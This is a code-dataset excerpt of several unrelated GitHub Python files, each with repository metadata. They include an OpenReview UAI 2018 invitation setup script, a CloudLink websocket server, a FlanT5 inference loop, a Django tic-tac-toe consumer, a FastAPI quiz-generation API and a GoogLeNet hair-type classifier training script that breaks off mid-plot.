Selecting \\'All Users\\' will allow paper authors, reviewers, area chairs, and program chairs to view this comment.',\n 'values-dropdown': [\n #mask_allusers_group,\n #mask_authors_group,\n mask_reviewers_group,\n mask_areachair_group,\n program_chairs_id\n ]\n },\n 'nonreaders': {\n 'values': [mask_unsubmitted_group]\n },\n 'signatures': {\n 'description': '',\n 'values-regex': '|'.join([\n mask_anonreviewer_group,\n #mask_authors_group,\n mask_anonac_group,\n program_chairs_id,\n conference\n ]),\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values-copied': [conference, '{signatures}']\n },\n 'content': invitations.content.comment\n }\n },\n 'Official_Review': {\n 'id': conference + '/-/Paper/Official_Review',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [mask_reviewers_group],\n 'noninvitees': [\n mask_submitted_group,\n mask_areachair_group\n ],\n 'signatures': [conference],\n 'duedate': 1524355199000, # Saturday, April 21, 2018 11:59:59 PM\n 'process': os.path.join(os.path.dirname(__file__), '../process/officialReviewProcess.js'),\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'The users who will be allowed to read the reply content.',\n 'values': [conference, mask_authors_group, mask_reviewers_group, mask_areachair_group, program_chairs_id]\n },\n 'nonreaders': {\n 'values': [mask_unsubmitted_group]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': mask_anonreviewer_group\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values': [conference]\n },\n 'content': invitations.content.review\n }\n },\n 'Meta_Review': {\n 'id': conference + '/-/Paper/Meta_Review',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [mask_areachair_group],\n 'noninvitees': [],\n 'signatures': [conference],\n 'process': os.path.join(os.path.dirname(__file__), '../process/metaReviewProcess.js'),\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'Select all user groups that should be able to read this comment. 
Selecting \\'All Users\\' will allow paper authors, reviewers, area chairs, and program chairs to view this comment.',\n 'values': [conference, mask_areachair_group, program_chairs_id]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': mask_anonac_group\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values-regex': mask_anonac_group\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your review.',\n 'required': True\n },\n 'recommendation': {\n 'order': 2,\n 'value-radio': [\n '(3) Strong accept',\n '(2) Weak accept',\n '(1) Reject'\n ],\n 'required': True\n },\n 'metareview': {\n 'order': 3,\n 'value-regex': '[\\\\S\\\\s]+',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons',\n 'required': True\n },\n 'presentation format': {\n 'order': 4,\n 'value-radio': [\n 'Oral',\n 'Poster',\n ],\n 'required': True\n },\n 'best paper':{\n 'order': 5,\n 'description': 'Nominate as best paper (if student paper, nominate for best student paper)',\n 'value-radio': [\n 'Yes',\n 'No'\n ],\n 'required': False\n },\n 'best student paper':{\n 'order': 6,\n 'description': 'Nominate as best student paper',\n 'value-radio': [\n 'Yes',\n 'No'\n ],\n 'required': False\n }\n }\n }\n },\n 'Review_Rating': {\n 'id': conference + '/-/Paper/Review_Rating',\n 'readers': [conference, program_chairs_id, mask_areachair_group],\n 'writers': [conference],\n 'invitees': [\n mask_areachair_group,\n program_chairs_id,\n conference\n ],\n 'noninvitees': [],\n 'signatures': [conference],\n 'duedate': openreview.tools.timestamp_GMT(year=2018, month=5, day=19),\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'This rating is only visible to the UAI program chairs.',\n 'values': [program_chairs_id]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '{}|{}'.format(mask_anonac_group, program_chairs_id)\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values-regex': '{}|{}'.format(mask_anonac_group, program_chairs_id)\n },\n 'content': {\n 'title': {\n 'value': 'Review ratings for Paper',\n 'description': 'Anonymous ratings of review quality. These will not be shared without your explicit consent.',\n 'order': 0\n },\n 'AnonReviewer1': {\n 'description': 'Rating for this reviewer',\n 'order': 7,\n 'value-radio': [\n '5. Reviewer feedback was very informative, factually correct and constructive.',\n '4. Reviewer feedback was informative but it contained some factual errors or missing points which were later acknowledged.',\n '3. Reviewer feedback was mostly informative, but not entirely accurate.',\n '2. Reviewer feedback was not very informative.',\n '1. Reviewer feedback was incorrect or reviewer did not seem to have read the paper in enough detail.'\n ],\n 'required': True,\n },\n 'AnonReviewer2': {\n 'description': 'Rating for this reviewer',\n 'order': 8,\n 'value-radio': [\n '5. Reviewer feedback was very informative, factually correct and constructive.',\n '4. Reviewer feedback was informative but it contained some factual errors or missing points which were later acknowledged.',\n '3. Reviewer feedback was mostly informative, but not entirely accurate.',\n '2. Reviewer feedback was not very informative.',\n '1. 
Reviewer feedback was incorrect or reviewer did not seem to have read the paper in enough detail.'\n ],\n 'required': True,\n },\n 'AnonReviewer3': {\n 'description': 'Rating for this reviewer',\n 'order': 9,\n 'value-radio': [\n '5. Reviewer feedback was very informative, factually correct and constructive.',\n '4. Reviewer feedback was informative but it contained some factual errors or missing points which were later acknowledged.',\n '3. Reviewer feedback was mostly informative, but not entirely accurate.',\n '2. Reviewer feedback was not very informative.',\n '1. Reviewer feedback was incorrect or reviewer did not seem to have read the paper in enough detail.'\n ],\n 'required': True,\n },\n }\n }\n },\n 'Final_Decision': {\n 'id': conference + '/-/Paper/Final_Decision',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [conference, program_chairs_id],\n 'noninvitees': [],\n 'signatures': [conference],\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'The readers of this note',\n 'values': [conference, program_chairs_id, mask_authors_group, mask_reviewers_group, mask_areachair_group ]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [program_chairs_id]\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values': [conference, program_chairs_id],\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value': 'Paper Final Decision',\n },\n 'decision': {\n 'order': 2,\n 'value-radio': [\n 'Accept',\n 'Reject'\n ],\n 'required': True\n },\n 'comment': {\n 'order': 3,\n 'value-regex': '[\\\\S\\\\s]+',\n 'description': 'Additional commentary about the decision',\n 'required': False\n },\n 'presentation format': {\n 'order': 4,\n 'value-radio': [\n 'Oral',\n 'Poster',\n ],\n 'required': False\n }\n }\n }\n }\n}\n\ndef get_invitation_template(template_id, disable=False):\n invitation_template = invitation_templates[template_id]\n if disable:\n invitation_template['invitees'] = []\n return invitation_template\n\n## Argument handling\nparser = argparse.ArgumentParser()\nparser.add_argument('invitations', nargs='*', help=\"invitation id: \" + \", \".join(invitation_templates.keys()))\nparser.add_argument('--disable', action='store_true', help='if present, disables the given invitation. otherwise, enables the invitation')\nparser.add_argument('--baseurl', help=\"base url\")\nparser.add_argument('--username')\nparser.add_argument('--password')\nargs = parser.parse_args()\n\nif args.invitations == ['all']:\n invitations_to_process = invitation_templates.keys()\nelse:\n invitations_to_process = args.invitations\n\nassert all(id in invitation_templates.keys() for id in args.invitations), \"Invalid invitation. 
You must choose from the following: {}\".format(invitation_templates.keys())\n\nclient = openreview.Client(baseurl=args.baseurl, username=args.username, password=args.password)\n\npapers = client.get_notes(invitation = 'auai.org/UAI/2018/-/Blind_Submission')\n\nfor paper in papers:\n for template_id in invitations_to_process:\n invitation_template = get_invitation_template(template_id, disable=args.disable)\n new_inv = invitations.from_template(invitation_template, paper)\n client.post_invitation(new_inv)\n\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/auai.org/UAI/2018/python/setup-invitations.py","file_name":"setup-invitations.py","file_ext":"py","file_size_in_byte":14437,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"21662175453","text":"\"\"\"\r\nMikeDEV's CloudLink Server\r\nCloudLink is a websocket extension for Scratch 3.0, which allows MMOs, Web Browsers, BBSs, chats, and more, all using Scratch 3.0. It's cloud variables, but better. \r\nOrigial concept created in 2018.\r\nRewritten in 2020.\r\nFor more details about CloudLink, please visit\r\nhttps://github.com/MikeDev101/cloudlink\r\n\"\"\"\r\n\r\nvers = \"S1.1\"\r\n\r\nimport asyncio\r\nimport json\r\nimport websockets\r\nimport sys\r\n\r\nPORT = 3000\r\n\r\nglobal USERNAMES\r\n\r\nSTREAMS = {\"gs\": \"\"} #Define data streams, will improve upon this design later\r\nUSERS = set() #create unorganized, non-indexed set of users\r\nUSERNAMES = [] #create organized, indexable list of users\r\n\r\ndef state_event_global(): #Prepare data to be sent to clients on the global data stream\r\n x = {\r\n \"type\":\"gs\",\r\n \"data\":str(STREAMS[\"gs\"])\r\n }\r\n return json.dumps(x)\r\n\r\nasync def notify_state_global():\r\n if USERS:\r\n message = state_event_global() # Send global data to every client\r\n await asyncio.wait([user.send(message) for user in USERS])\r\n\r\ndef state_event_private(uname): #Prepare data to be sent to specific clients on the private data streams\r\n y = {\r\n \"type\":\"ps\",\r\n \"data\":str(STREAMS[uname]),\r\n \"id\":str(uname)\r\n }\r\n return json.dumps(y)\r\n\r\nasync def notify_state_private(e):\r\n if USERS:\r\n message = state_event_private(e) #Send private data to every client, only one client will store the data, others will ignore\r\n #await asyncio.wait([user.send(message) for user in USERS])\r\n for user in USERS:\r\n await asyncio.wait([user.send(message)])\r\n\r\ndef prepare_usernames(): # Generate primitive array of usernames\r\n y = \"\"\r\n for x in range(len(USERNAMES)):\r\n y = str(y + USERNAMES[x] + \";\")\r\n z = {\r\n \"type\":\"ul\",\r\n \"data\":str(y)\r\n }\r\n return json.dumps(z)\r\n\r\nasync def update_username_lists():\r\n if USERS:\r\n message = prepare_usernames() #Send username list to all clients\r\n #await asyncio.wait([user.send(message) for user in USERS])\r\n for user in USERS:\r\n await asyncio.wait([user.send(message)])\r\n\r\nasync def refresh_username_lists():\r\n if USERS:\r\n z = {\r\n \"type\":\"ru\",\r\n \"data\":\"\"\r\n }\r\n message = json.dumps(z)\r\n for user in USERS:\r\n await asyncio.wait([user.send(message)])\r\n\r\nasync def register(websocket): #Create client session\r\n USERS.add(websocket)\r\n\r\nasync def unregister(websocket): #End client session\r\n USERS.remove(websocket)\r\n\r\nasync def server(websocket, path):\r\n global USERNAMES\r\n await register(websocket)\r\n await notify_state_global()\r\n await update_username_lists()\r\n try:\r\n await 
websocket.send(state_event_global())\r\n        async for message in websocket:\r\n            data = message.split(\"\\n\")\r\n            if data[0] == \"<%gs>\": # Global stream update command\r\n                STREAMS[\"gs\"] = str(data[2])\r\n                await notify_state_global()\r\n            elif data[0] == \"<%ps>\": # Private stream update command\r\n                if data[2] in USERNAMES:\r\n                    STREAMS[str(data[2])] = str(data[3])\r\n                    await notify_state_private(str(data[2]))\r\n            elif data[0] == \"<%ds>\": # Disconnect command\r\n                if data[1] in USERNAMES:\r\n                    print(\"[ i ] Disconnecting user:\", str(data[1]))\r\n                    USERNAMES.remove(str(data[1]))\r\n                    STREAMS.pop(str(data[1]))\r\n                    await unregister(websocket)\r\n                    await update_username_lists()\r\n            elif data[0] == \"<%sn>\": # Append username command\r\n                print(\"[ i ] User connected:\", data[1])\r\n                USERNAMES.append(str(data[1]))\r\n                STREAMS[str(data[1])] = \"\"\r\n                await update_username_lists()\r\n            elif data[0] == \"<%rf>\": # Refresh user list\r\n                print(\"[ i ] Refreshing user list...\")\r\n                USERNAMES = []\r\n                await update_username_lists()\r\n                await refresh_username_lists()\r\n            else: # Generic unknown command response\r\n                print(\"[ ! ] Error: Unknown command:\", str(data))\r\n    except Exception as e:\r\n        print(\"[ i ] Whoops! Something went wrong. Here's the error:\", e)\r\n        await unregister(websocket) # If all things fork up, kill the connection\r\n        USERNAMES = [] # Force update of usernames in the server\r\n        await update_username_lists()\r\n        await refresh_username_lists()\r\n\r\nprint(\"MikeDEV's CloudLink API Server v\" + vers + \"\\nNow listening for requests on port \" + str(PORT) + \".\\n\")\r\ncl_server = websockets.serve(server, \"localhost\", PORT)\r\n\r\nwhile True:\r\n    try:\r\n        asyncio.get_event_loop().run_until_complete(cl_server)\r\n        asyncio.get_event_loop().run_forever()\r\n    except:\r\n        print(\"[ i ] Stopping the CloudLink API server...\")\r\n        sys.exit()\r\n","repo_name":"retronbv/CloudLinkGC","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71830726506","text":"from transformers import T5Tokenizer, T5ForConditionalGeneration\nimport torch\nimport json\n\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\n\ntokenizer = T5Tokenizer.from_pretrained(\"google/flan-t5-xxl\")\nmodel = T5ForConditionalGeneration.from_pretrained(\"google/flan-t5-xxl\")\n\nmodel.parallelize({\n\t\t 0: [0,1, 2],\n\t\t 1: [3, 4, 5],\n\t\t 2: [6, 7, 8],\n\t\t 3: [9, 10, 11],\n\t\t 4: [12, 13, 14],\n\t\t 5: [15, 16, 17],\n\t\t 6: [18, 19, 20],\n\t\t 7: [21, 22, 23]\n\t\t})\n\n\nfr = open('Techspec_Wiki_Bing_Sum_test.jsonl','r')\nfw = open('FlanT5_Domain_knowledge_predicted','w')\nfw_ref = open('FlanT5_Domain_knowledge_references','w')\nlines = fr.readlines()\n\n\n\ncount = 0\n\nfor line in lines:\n\tprint(count)\n\tcount += 1\n\n\tline_obj = json.loads(line.strip())\n\t\n\tinput_ids = tokenizer(line_obj['input'], return_tensors=\"pt\").input_ids.to(device)\n\toutputs = model.generate(input_ids,max_length=2300,early_stopping=True)\n\tpredicted_result = tokenizer.decode(outputs[0]).replace(\"<pad>\", \"\").replace(\"</s>\", 
\"\")\t\n\n\tfw.write(predicted_result+'\\n')\n\tfw_ref.write(line_obj['output']+'\\n')\n\nfw.close()\nfw_ref.close()","repo_name":"nlpxucan/flant5","sub_path":"flant5_inference.py","file_name":"flant5_inference.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37648584524","text":"# MICROSOFT\n\"\"\"\n SOLVED -- GFG Longest Consecutive 1's \n Return the longest run of 1s for a given integer n's binary representation.\n Example:\n Input: 242\n Output: 4\n 242 in binary is 0b11110010, so the longest run of 1 is 4.\n\"\"\"\ndef longest_run(n):\n # Time: O(logn) Space: O(1)\n run = curr = 0\n while n:\n if not n % 2:\n run = max(run, curr)\n curr = 0\n else:\n curr += 1\n n = n // 2\n\n return max(run, curr)\n\n\nprint(longest_run(242))\n# 4","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2019/11-November/11.06.py","file_name":"11.06.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43136028596","text":"import json\nfrom threading import Thread\nimport concurrent.futures\nfrom multiprocessing.pool import ThreadPool\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom .models import TicTacToe\n\n\nclass TicTacToeConsumer(AsyncJsonWebsocketConsumer):\n id_game=None\n\n async def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['sala']\n self.room_group_name = 'sala_%s' % self.room_name\n \n # Unirse a la sala\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n await self.accept()\n\n # Abandono de sala o desconexión.\n async def disconnect(self, close_code):\n print(\"Desconectado\",self.id_game)\n if self.id_game != None:\n thread=Thread(target=TicTacToe.discPartida,args=(self,self.id_game))\n thread.start()\n await self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n \n async def receive(self, text_data):\n \"\"\"\n Receive mensaje from WebSocket.\n Get the evento and send the appropriate evento\n \"\"\"\n response = json.loads(text_data)\n evento = response.get(\"evento\", None)\n mensaje = response.get(\"mensaje\", None)\n if evento == 'MOVE':\n # Send mensaje to room group\n if mensaje != None:\n thread=Thread(target=TicTacToe.updateTablero,args=(self,mensaje['id_game'],mensaje['ficha'],mensaje['index']))\n thread.start()\n await self.channel_layer.group_send(self.room_group_name, {\n 'type': 'send_mensaje',\n 'mensaje': mensaje,\n \"evento\": \"MOVE\"\n })\n \n if evento == 'START':\n # Send mensaje to room group\n print('inicio partida')\n if mensaje != None:\n with concurrent.futures.ThreadPoolExecutor() as executor:\n thread = executor.submit(TicTacToe.crearSala,mensaje['sala'],mensaje['jugador'],mensaje['ficha'])\n self.id_game = thread.result()\n await self.channel_layer.group_send(self.room_group_name, {\n 'type': 'send_mensaje',\n 'mensaje': mensaje,\n 'evento': \"START\"\n })\n \n if evento == 'END':\n # Send mensaje to room group\n if mensaje != None:\n thread=Thread(target=TicTacToe.cerrarPartida,args=(self,mensaje['id_game'],mensaje['ficha'],mensaje['index'],mensaje['final']))\n thread.start()\n await self.channel_layer.group_send(self.room_group_name, {\n 'type': 'send_mensaje',\n 'mensaje': mensaje,\n 'evento': \"END\"\n })\n \n\n async def send_mensaje(self, res):\n \"\"\" Receive mensaje from room group \"\"\"\n # Send mensaje to WebSocket\n 
if self.id_game != None:\n await self.send(text_data=json.dumps({\n \"respuesta\": res,\n \"id_game\": str(self.id_game),\n }))\n else:\n await self.send(text_data=json.dumps({\n \"respuesta\": res,\n }))","repo_name":"Francisco-Neff/boardgames","sub_path":"tictactoe/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40861195125","text":"from fastapi import FastAPI\nfrom fastapi.responses import Response\nfrom annotations import Annotations as A\nfrom data_extactor import extract_data_from_webpage\nfrom llm_handler import query_llm\n\napp = FastAPI()\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Salam 3alam\"}\n\n\n@app.post(\n \"/prodive_data_source\",\n summary='Provide the url for a website to scrap and add to the knowledge base',\n description=\n 'Provide the URL for web content, which will be used as knowledge database for future question creation. '\n 'Content will be scrapped from URL and all subpages recursively and converted to knowledge database.'\n '\\n\\n'\n 'Provided knowledge_base_id will be associated with created knowledge database.'\n '\\n\\n'\n 'To check for existing knowledge databases and their respective IDs, '\n 'see `/api/v1/content/list` (not implemented).'\n)\nasync def extract_data_from_web_data_source(\n knowledge_base_id: A.knowledge_base_id,\n url: A.url\n):\n if extract_data_from_webpage(knowledge_base_id=knowledge_base_id, url=url):\n return Response(status_code=200)\n else:\n return Response(status_code=400)\n \n\n@app.post(\n \"/generate_activity\",\n summary='Generate an assessment activity for a given outcome and a knowledge database',\n description=\n 'Generate an assessment activity of questions for the given knowledge base.'\n 'If no knowledge is associated with given ID, returns an error.'\n)\nasync def generate_activity(\n knowledge_base_id: A.knowledge_base_id,\n outcome: A.outcome,\n number_of_questions: A.number_of_questions,\n question_types: A.question_types\n) -> str:\n return query_llm(knowledge_base_id, outcome, number_of_questions, question_types)\n","repo_name":"nurlingo/llm-examiner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20624061415","text":"import re\r\nimport os\r\nimport sys\r\n\r\ndef Main(file_path):\r\n files = os.listdir(file_path[1][:-12])\r\n\r\n for f in files:\r\n if f[(len(f)-3):] == 'mf4':\r\n print(f)\r\n \r\nif __name__ == \"__main__\":\r\n Main(sys.argv)","repo_name":"AtillaP/ScriptsForDailyJob","sub_path":"filelistOfAFolder.py","file_name":"filelistOfAFolder.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33114933774","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 29 17:16:32 2022\n\n@author: tle19\nhttps://medium.com/nerd-for-tech/image-classification-using-transfer-learning-pytorch-resnet18-32b642148cbe\n\nfully connected layers\nhttps://pythonguides.com/pytorch-fully-connected-layer/\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, models, transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport pandas as pd\nimport json\nimport matplotlib as 
mpl\nmpl.use('Agg')\nos.chdir('/home/tle19/Desktop/ResNet_pretrained/')\nimport csv\nimport json\nimport sys\nimport glob\nfrom PIL import Image\nfrom datetime import datetime, date\nfrom torchvision.utils import make_grid\nimport shutil\nfrom torch.utils.data import Dataset, DataLoader, WeightedRandomSampler\nfrom sklearn.model_selection import train_test_split\nfrom batchgenerators.utilities.file_and_folder_operations import *\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\n\nfrom custom_transforms import *\n\n\ntraining_validation_path = '/home/tle19/Desktop/ResNet_pretrained/Images/'\n\nclasses=['3A', '3B', '3C', '4A', '4B', '4C']\n# classes=['3A', '3B', '3C']\n# classes=['4A', '4B', '4C']\nim_paths, labels=[], []\n\n# Find image paths\n_=[im_paths.append(glob.glob(os.path.join(training_validation_path, i, \"*\"))) for i in classes]\nim_paths=np.hstack(im_paths)\n# Collect labels from image folders\n_=[labels.append(j.split('/')[-2]) for j in im_paths]\n\n\n# Split into training and test\nX_train, X_test, y_train, y_test = train_test_split(im_paths, labels, test_size=0.1, shuffle=True, stratify=labels)\nnp.save(f'/home/tle19/Desktop/ResNet_pretrained/results/test_cases-{date.today().strftime(\"%d%B\")}{datetime.now().strftime(\"%H:%M\")}.npy', X_test)\n# Split into training and val\nX_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=1/4.5, shuffle=True, stratify=y_train)\n\nprint(f'There are {len(X_train)} training images and {len(X_val)} test images ({len(X_train)+len(X_val)} total)')\n\n#%%\n\"\"\"Set dataloader\"\"\"\n\nclass hair_dataset(Dataset):\n def __init__(self, root_dir, transforms):\n self.root_dir = root_dir\n self.transforms = transforms\n\n def __len__(self):\n return len(self.root_dir)\n\n def __getitem__(self, index):\n # Select sample\n image = Image.open(self.root_dir[index]).convert(\"RGB\")\n label=self.convert_labels(self.root_dir[index])\n sample={'image': image, 'label': label} #Make image and label a dict pair\n\n transformed_im = self.transforms(sample) #Perform transforms\n\n return (transformed_im['image'], transformed_im['label'])\n\n# Convert alphabetical labels to numbers (starting at 1)\n def convert_labels(self, dir):\n classes=['3A', '3B', '3C', '4A', '4B', '4C']\n\n label=np.where(dir.split('/')[-2]==np.array(classes))[0][0] #Labels between 1-6, set label as index in list\n return label\n\n# Calculate normalisation parameters\nbatch_size = 8\nimg_height, img_width = 400, 400\n\n#%%\n\"\"\"Create datasets\"\"\"\nmeans= [0.449891447249903, 0.34121201611416146, 0.2946232938238485]\nstds= [0.31363333313315633, 0.25191345914521435, 0.22231266962369908]\n\ntrain_transforms = transforms.Compose([\n RandomFlip(),\n RandomRotate(),\n RandomCrop(sizes=(400)), #220\n RandomGaussianBlur(),\n # RandomInv(),\n Random_Brightness(),\n Random_Contrast(),\n Random_Saturation(),\n Adjust_Gamma(),\n Adjust_Sharpness(),\n ToTensor(),\n Normalise(means=means,stds=stds,),\n Rescale_pixel_values(),\n Resize(sizes=img_height),\n]) \n\nval_transforms = transforms.Compose([\n ToTensor(),\n Normalise(means=means,stds=stds,),\n Rescale_pixel_values(),\n Resize(sizes=img_height),\n]) \n \n#define class sampler\n# This can be removed\ndef find_sampler(training_samples, classes, batch_size):\n _,counts=np.unique(training_samples, return_counts=True) #find no of unique labels\n class_weights=[sum(counts)/c for c in counts] #find weights\n # class_weights[1]*=0.5\n labels=[np.where(training_samples[i]==np.array(classes))[0][0] for i in 
range(len(training_samples))]#convert hair labels to ints\n example_weights=[class_weights[i] for i in labels]#assign weight to each sample\n sampler=WeightedRandomSampler(example_weights, len(training_samples), replacement=False)\n return sampler\n \n#load training data\ntraining_sampler=find_sampler(y_train, classes, batch_size)\ntrain_dataset = hair_dataset(X_train, transforms=train_transforms)\ntrain_dl = DataLoader(train_dataset, sampler=training_sampler, batch_size=batch_size, num_workers=4, pin_memory=True)\n\n#load val data\nval_sampler=find_sampler(y_val, classes, batch_size)\nval_dataset = hair_dataset(X_val, transforms=val_transforms)\nval_dl = DataLoader(val_dataset, sampler=val_sampler, batch_size=batch_size, num_workers=4, pin_memory=True)\n\n#PLot a batch \n# data_iter = iter(train_dl)\n# images, labels = data_iter.next()\n\n# grid = make_grid(images[0], padding=2)\n# fig = plt.figure(figsize=(20, 20))\n# plt.imshow(grid.numpy().transpose((1, 2, 0)))\n# plt.axis('off')\n#%% TRAINING\n#iterations needed for each epoch\niterations=int(np.ceil(len(X_train)/batch_size))\n\nepochs=150\nprint(f'{epochs} epochs and {iterations} iterations')\n\n# OPTIMISER PARAMETERS\nlr = 0.001 # authors cite 0.1\nmomentum = 0.9\nweight_decay = 1e-4 #0.0001 \n\n# LEARNING RATE ADJUSTMENT\n# milestones = [round(0.5*epochs/iterations), round(0.75*epochs/iterations)]\nmilestones = [25, 50]\nmilestones_on=False\nprint(f'LR reduced by factor of 10 at epochs {milestones}' if milestones_on else 'No LR reduction')\n# Divide learning rate by 10 at each milestone\ngamma = 0.1\nprint('Using ', classes)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # device object\nmodel = models.googlenet(pretrained=True) #load resnet18 model\n\nmodel.fc = nn.Linear(model.fc.in_features, len(np.unique(classes)), bias=True) #replace 2 output notes with no of classes\nmodel = model.to(device) \n# print(model)\n#%%\ncriterion = nn.CrossEntropyLoss() #(set loss function)\noptimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay)\nscheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=milestones, gamma=gamma)\n\n#save parameters\nparams={ 'lr': lr, 'momentum': momentum, \n 'weight_decay': weight_decay, 'milestones on/off': milestones_on, 'milestones': milestones, 'epochs': epochs, 'gamma': gamma, 'labels_used': classes}\nsave_json(params, '/home/tle19/Desktop/ResNet_pretrained/results/params.json')\n\n#set save path\nsave_path = f'/home/tle19/Desktop/ResNet_pretrained/results/resnet50-{date.today().strftime(\"%d%B\")}{datetime.now().strftime(\"%H:%M\")}.pth'\n\n#copy current transforms file\n_=shutil.copy('/home/tle19/Desktop/ResNet_pretrained/custom_transforms.py', '/home/tle19/Desktop/ResNet_pretrained/results/custom_transforms.py')\n\nbest_acc=0.\nbest_acc1=0.\ncols = ['epoch', 'train_err', 'val_err', 'train_loss', 'val_loss']\nresults_df = pd.DataFrame(columns=cols).set_index('epoch')\nfor epoch in range(epochs): #(loop for every epoch)\n t0 = time.time()\n print(\"Epoch {}\".format(epoch)) #(printing message)\n \"\"\" Training Phase \"\"\"\n model.train() #(training model)\n running_loss, running_corrects = 0. 
,0 #(set loss 0)\n # load a batch data of images\n for i, (inputs, labels) in enumerate(train_dl):\n inputs = inputs[0].to(device)\n labels = labels.to(device) \n # forward inputs and get output\n optimizer.zero_grad()\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n # get loss value and update the network weights\n loss.backward()\n optimizer.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n if milestones_on==True:\n scheduler.step()\n train_loss = running_loss / len(train_dataset)\n train_acc = running_corrects / len(train_dataset) * 100.\n print('[Train #{}] Loss: {:.4f} Acc: {:.4f}%'.format(epoch, train_loss, train_acc))\n \n \"\"\" Testing Phase \"\"\"\n model.eval()\n with torch.no_grad():\n running_loss, running_corrects = 0. ,0 #(set loss 0)\n\n for inputs, labels in val_dl:\n inputs = inputs[0].to(device)\n labels = labels.to(device)\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n val_loss = running_loss / len(val_dataset)\n val_acc = running_corrects / len(val_dataset) * 100.\n print('[Test #{}] Loss: {:.4f} Acc: {:.4f}%'.format(epoch, val_loss, val_acc))\n \n # if val_acc>80:\n # optimizer = optim.SGD(model.parameters(), lr=lr/10, momentum=momentum, weight_decay=weight_decay)\n \n results_df.loc[epoch] = [train_acc.cpu(), val_acc.cpu(), train_loss, val_loss] \n print('This epoch took {} seconds'.format(np.round(time.time() - t0, 3)))\n if (val_acc > best_acc):\n torch.save(model.state_dict(), save_path)\n best_acc = val_acc\n if train_acc>best_acc1:\n best_acc1=train_acc\n \n fig, (ax1,ax2) = plt.subplots(nrows=1, ncols=2, figsize = (20,10), tight_layout = True)\n # _=plt.subplot(121)\n plt.rcParams['font.size'] = '20'\n ax1.plot(np.arange(len(results_df.train_err.values)), results_df.train_err.values, label='train')\n ax1.plot(np.arange(len(results_df.train_err.values)), results_df.val_err.values, label='val')\n ax1.legend(loc='upper left')\n ax1.set_xlabel('epochs')\n ax1.set_ylabel('Acc (%)')\n txt='best train score: ' + str(np.round(best_acc1.cpu().detach().numpy(),1)) + '\\nbest val score: ' + str(np.round(best_acc.cpu().detach().numpy(),1))\n ax1.text(0.5, 1, txt, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)\n\n #plot loss \n # _=plt.subplot(122)\n ax2.plot(np.arange(len(results_df.train_loss.values)), results_df.train_loss.values, label='train', color='r')\n ax2.plot(np.arange(len(results_df.train_loss.values)), results_df.val_loss.values, label='val', color='g')\n ax2.legend(loc='upper right')\n ax2.set_xlabel('epochs')\n ax2.set_ylabel('CE Loss')\n txt='best train loss: ' + str(np.round(min(results_df.train_loss.values),3)) + '\\nbest val loss: ' + str(np.round(min(results_df.val_loss.values),3))\n 